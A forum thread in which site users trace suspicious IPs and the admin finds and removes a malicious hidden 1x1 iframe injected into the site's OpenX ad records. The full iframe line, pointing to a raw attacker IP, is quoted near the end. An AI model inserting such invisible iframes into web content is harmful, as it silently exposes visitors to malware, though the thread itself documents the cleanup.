[Proculation]

ASLplease: the resemblance doesn't really mean anything if it's not the last number of the IP. It's just a coincidence usually. The one from Bart is from Russia while the one you gave is from Port of Spain in Trinidad-and-Tobago. But, those are usually places I would doubt are legitimate.

[Proculation]

And yes, to trace the origin of the provider of an IP, you use a service called "WHOIS". It works with domain names (to see who registered the domain) and IP addresses (to see to whom belongs an address).

[Strutz]

WDHIII WDHIII:

Yup!

There are site all over the net you can use to look up an IP.

I use Geobytes, Whois or Arin when lookin up IPs for the radio. Most will give you the same info; Host, location, city and organization PLUS, if things are really bad, an ABUSE email addy.

Unfortunately unless you want to go the legal route they really cant tell you much

Thanks!

Hmmmm... interesting... it's local...
Oh well, since that password change several months ago I haven't had an issue but now I know how to trace it.

[Brenda]

Strutz Strutz:

WDHIII WDHIII:

Yup!

There are site all over the net you can use to look up an IP.

I use Geobytes, Whois or Arin when lookin up IPs for the radio. Most will give you the same info; Host, location, city and organization PLUS, if things are really bad, an ABUSE email addy.

Unfortunately unless you want to go the legal route they really cant tell you much

Thanks!

Hmmmm... interesting... it's local...
Oh well, since that password change several months ago I haven't had an issue but now I know how to trace it.

Hmmm, according to WhoIs, I am in Kelowna...

[herbie]

You ARE in Kelowna. The computer says so. Better change all your paperwork.

[herbie]

Just installed AdBlocker 1.2 and the warnings are gone. Looks like the Google Ad was the problem.

[Brenda]

herbie herbie:

You ARE in Kelowna. The computer says so. Better change all your paperwork.

[DrCaleb]

Brenda Brenda:

herbie herbie:

You ARE in Kelowna. The computer says so. Better change all your paperwork.

Many ISPs use their head office as the geolocation reslover for their netblocks. I love ISPs that do that. Gives malicious websites bad information about me.

[Regina]

[herbie]

DrCaleb DrCaleb:

Brenda Brenda:

herbie herbie:

You ARE in Kelowna. The computer says so. Better change all your paperwork.

Many ISPs use their head office as the geolocation reslover for their netblocks. I love ISPs that do that. Gives malicious websites bad information about me.

I love those ads! The ones to "Meet local hot girls in - Portage - BC" and there's pics of a couple young hotties. "Portage" is a reserve about 60 miles up the lake population about 40 people. If any guy from there signed up they'd line him up with his sister, daughter, cousin, own wife....

[Canadaka]

I did a search of the entire CKA data base for mentions of the 2 IPs below, fond nothing.. so doens't seem like SQL injection.
91.213.174.37
194.8.250.213

I'm going to try disabling the OpenX ad system the site uses for a day, so please let me know if that stops the problem. So I can narrow down where the problem might be.

I still have never got this problem... it could be a virus or adware that is on your local computers and has spread to many people.

[Canadaka]

Oh wait, I forgot to search the CKA OpenX database, and I found 2 instances of the IP in the "append" field for 3 of the google ads.

$1:

<iframe src="http://91.213.174.37/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="no" scrolling="no"></iframe>

So somehow a hacker found an SQL injection hole in the OpenX software and added that in there.

[DrCaleb]

Canadaka Canadaka:

So somehow a hacker found an SQL injection hole in the OpenX software and added that in there.

I say we go to Volograd, and explain some things to Dmitriy Vladimirovich.

[andyt]

Google is working for me today, so the fix seems to have worked.

[Brenda]

CKA on EI doesn't cause Avast to go rampant anymore, so I think Trev did a fabulous job

Thanks Trev!!